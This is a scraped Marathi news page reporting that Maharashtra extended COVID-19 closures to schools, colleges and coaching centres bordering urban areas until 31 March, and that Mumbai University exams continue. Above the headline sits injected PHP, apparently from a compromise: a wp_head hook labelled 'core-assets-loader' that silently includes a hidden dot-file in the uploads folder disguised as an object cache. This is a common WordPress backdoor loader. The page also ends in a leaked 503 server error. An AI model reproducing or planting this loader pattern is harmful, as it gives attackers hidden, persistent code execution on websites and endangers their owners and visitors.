add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); शहरांच्या हद्दीलगतच्या शिक्षण संस्थांही बंद – SOCH INDIA
Menu

देश
शहरांच्या हद्दीलगतच्या शिक्षण संस्थांही बंद

nobanner

राज्यातील महापालिका, नगरपालिका आणि नगर पंचायत क्षेत्रांबरोबरच त्यांच्या हद्दीलगतच्या गावांतील खासगी शाळा, महाविद्यालये, खासगी शिकवण्या, प्रशिक्षण केंद्रे ३१ मार्चपर्यंत बंद ठेवण्याच येतील, असे शासनाने स्पष्ट केले आहे.

करोना विषाणूचा प्रादुर्भाव रोखण्यासाठी महापालिका, नगरपालिका आणि नगर पंचायत हद्दीतील शिक्षण संस्थांना सुट्टी देण्याचे आदेश शासनाने शनिवारी दिले होते. तांत्रिकदृष्टय़ा शहरे किंवा नगरांच्या हद्दीच्या बाहेर परंतु शहरालगत अनेक मोठी शिक्षणसंकुले आहेत. त्याचप्रमाणे विद्यार्थी वसतिगृहेही आहेत. त्यांच्या सुट्टीबाबत संभ्रम निर्माण झाला होता. त्या अनुषंगाने महापालिका, नगरपालिका आणि नगर पंचायत क्षेत्रांबरोबरच त्यांच्या हद्दीलगतच्या गावांतील खासगी शाळा, महाविद्यालये, खासगी शिकवण्या, प्रशिक्षण केंद्रे ३१ मार्चपर्यंत बंद ठेवण्यात यावेत, असे शासनाने स्पष्ट केले आहे.

शहरे आणि ग्रामिण भागांतून रोज या संस्थांमध्ये विद्यार्थ्यांची ये-जा सुरू असते. त्यामुळे हद्दीलगतच्या संस्थाही बंद ठेवण्यात याव्यात असे शासनाने म्हटले आहे. त्याचप्रमाणे आजारी विद्यार्थी इतर विद्यार्थ्यांच्या संपर्कात येणार नाहीत याची काळजी घेण्याची सूचनाही शिक्षण संस्थांना केली आहे.

विद्यापीठाच्या परीक्षा आणि प्रशासकीय कामकाज सुरू

मुंबई विद्यापीठ आणि संलग्न महाविद्यालयांतील अध्यापनाचे काम विद्यापीठाने बंद केले असले तरी प्रात्यक्षिक परीक्षा, लेखी परीक्षा आणि प्रशासकीय कामकाज सुरू राहणार असल्याचे स्पष्ट केले आहे. विद्यापीठाच्या दूर आणि मुक्त अध्ययन संस्थेच्या परीक्षाही नियोजित वेळापत्रकाप्रमाणे होणार असून उन्हाळी सत्रात मानव्य, वाणिज्य आणि व्यवस्थापन, विज्ञान आणि तंत्रज्ञान, आंतरविद्याशाखा या शाखांतील ७५९ विद्यार्थी परीक्षा देणार आहेत. परीक्षा २३ मार्चपासून सुरू होणार असून त्याची प्रवेशपत्रे उपलब्ध झाली आहेत.

मुंबईत शिक्षक, मुख्याध्यापकांनाही सुट्टी

शासनाने शाळांना सुट्टी जाहीर केल्यानंतर शिक्षक आणि मुख्याध्यापकांच्या सुट्टीबाबत संभ्रम निर्माण झाला होता. शिक्षक आणि मुख्याध्यापक, शिक्षकेतर कर्मचारी यांनाही सुट्टी देण्यात यावी अशी मागणी संघटनांनी केली होती. त्या अनुषंगाने मुंबईतील शाळांमध्ये शिक्षक आणि मुख्याध्यापकांनाही सुट्टी असल्याचे शिक्षण निरीक्षक महेश पालकर यांनी स्पष्ट केले आहे. मात्र शिक्षकेतर कर्मचाऱ्यांना सुट्टीतून वगळण्यात आले आहे. त्याचप्रमाणे दहावी आणि बारावीच्या परीक्षा केंद्रांमध्ये शिक्षक, मुख्याध्यापक, कर्मचारी यांना सुट्टी असणार नाही, असे विभागाने स्पष्ट केले आहे.

503 Service Unavailable

Service Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Unavailable error was encountered while trying to use an ErrorDocument to handle the request.